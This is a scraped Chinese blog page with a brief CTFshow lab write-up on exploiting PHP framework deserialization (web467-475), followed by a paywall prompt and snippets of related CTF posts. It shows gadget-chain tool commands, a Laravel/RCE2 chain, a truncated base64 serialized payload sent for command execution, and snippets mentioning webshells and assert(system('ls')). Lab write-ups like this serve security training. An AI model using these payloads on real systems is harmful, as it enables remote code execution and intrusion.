ctfshow 框架复现 web467-web475

最新推荐文章于 2025-02-24 20:37:02 发布

原创

最新推荐文章于 2025-02-24 20:37:02 发布 · 719 阅读

10 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #笔记

这里直接实用php反序列化工具phpcgi进行攻击，里面继承了一些常见php框架的反序列化漏洞，找到合适的漏洞就可以利用了

./ghpgcc -l

找到具体的框架和对应的漏洞后

./ghpgcc -i Laravel/RCE2

将反序列化的值进行base64编码后进行命令执行

/admin/Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIA
KgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXE

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

NEO:Curi:aos

关注关注

10
点赞
踩
10

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ctfshow 框架复现工具版

2301_81040377的博客

07-26

793

首先下载工具PHPGGC。

ctfshow java (web 279-300)选做

ljc13626678577的博客

07-12

1809

ctfshow里面关于java的题目都和struct2专题有关，另外有少量的代码审计的题目。出于效率的考虑，选择选做一些题目。浅浅做几题尝试一下。

2 条评论您还未登录，请先登录后发表或查看评论

ctfshow 框架复现

akdelt的博客

05-05

916

又出现 debug 页面了。而且还得换 RCE9。Laravel RCE3 用不了了，我们用 4。生成后发现不行，反序列化结果会被调试页面覆盖。我们已经知道原理了，直接工具打吧。生成链子，这里我们用 RCE3。然后访问 1.txt 就行了。查看各种应用各种版本的链子。写一个脚本遍历所有 rce。快一点吧直接工具梭哈了。但是没有回显，写🐎进去。然后访问 1.txt。

CTFSHOW框架复现篇

羽的博客

06-28

1513

CTFSHOW 框架复现篇

CTFSHOW--PHPCVE复现

qq_49422880的博客

02-22

3546

CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样，没有任何的界面就直接抓包，发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。简介：

CTFSHOW PHPCVE复现

snowlyzz的博客

10-03

1009

PHPCVE 复现学习

CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web

2401_84297944的博客

04-28

1280

F12。

反序列化3（ctfshow web263-web267 ）

m0_72929232的博客

02-01

901

session.serialize_handler 是用来设置 session 序列化引擎的，在 5.5.4 前默认是 php，5.5.4后默认是 php_serialize，在 PHP 反序列化存储的 $_SESSION 数据时如果使用的引擎和序列化时使用的引擎不一样，就会导致数据无法正确第反序列化，也就是 session 反序列化漏洞。message.php页面要求设置Cookie：msg的值，没有要求，随便输入即可。用dirsearch扫一下，发现www.zip文件，访问下载下来是网站源码。

CTFshow——RealWorldCTF渗透赛第二期·复现

chongya927的博客

03-12

871

RealWorldCTF渗透赛第二期·个人复现

CTFshow-Web初级-复现

2301_80877061的博客

04-14

1337

如果你发现了错误或者有优化建议，欢迎你联系我。一般进入一个网站先考虑信息泄露的几个方向这里先用dirsearch扫目录扫到了robots.txt 进去看一眼继续访问(记得把*去除)显示403 说明该目录有东西尝试访问/.git/(注意最后的不要遗漏)依旧显示403 大概率git泄露使用git脚本访问/admin/secret.phpbp抓包字典爆破得到flag。

CTFshow-卷王杯-简单的re（复现）

ookami6497的博客

03-19

1468

普通的upx壳，放kali里面脱下壳就行运行进入主函数 __int64 sub_401165() { int v0; // edx int v1; // ecx int v2; // er8 int v3; // er9 __int64 result; // rax __int64 v5; // [rsp+8h] [rbp-1018h] char v6[112]; // [rsp+10h] [rbp-1010h] BYREF int v7; // [rs..

CTFshow——thinkphp专题

D.MIND 的博客

06-12

2010

570——闭包路由关注这段代码：这是闭包路由的用法，官方：手册闭包支持我们用phpinfo()函数测试一下：是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数，所以这里是不能被call_user_func调用的，而assert是一个函数。因此我想到了assert(system("ls"));，但在尝试ls /时却不行了，很迷。然后我想着参数转移一下。然后下意识构造出这样： /index.php/ctfshow/assert/$_POST[1

CTFSHOW ThinkPHP

最新发布

2301_80038080的博客

02-24

444

在ThinkPHP中，Pathinfo 是一种用于解析 URL 的模式，它允许通过路径参数来指定模块、控制器和方法。根据题目描述，flag 存在于 Admin 模块的 Login 控制器的 ctfshowLogin 方法中，因此需要通过 URL 访问该方法。在 ThinkPHP 的 Pathinfo 模式下，URL 的结构通常为：/index.php/模块/控制器/方法。

【Web】CTFSHOW-ThinkPHP5-6反序列化刷题记录(全)

uuzeray的博客

04-08

1057

纯记录exp，链子不作赘述。

ThinkPHP5远程代码执行高危漏洞(附:升级修复解决方法)

dabao87的博客

12-12

2万+

漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。漏洞评级严重影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 安全版本 ThinkPHP 5.0系列 5.0.23 ThinkPHP 5.1系列 5.1.31 ...

工具分享 | TPscan - 一键ThinkPHP漏洞检测getshell

IT软件汇

09-08

1049

TPscan是一款基于Python3的ThinkPHP漏洞检测工具。

红日靶机(五)笔记

LINGX5的博客

10-17

1784

本环境由两台靶机组成，其中web服务器是双网卡，即可以访问外网，又可以访问内网。而域控制器是不出网的。我们要通过win7进而拿下域控。主要练习Thinkphp的非强制路由导致的RCE，以及CS集成框架的使用包括横向移动、权限维持、痕迹清理操作等

CTFshow刷题日记-WEB-JAVA（web279-300）Struts2全漏洞复现，Java漏洞复现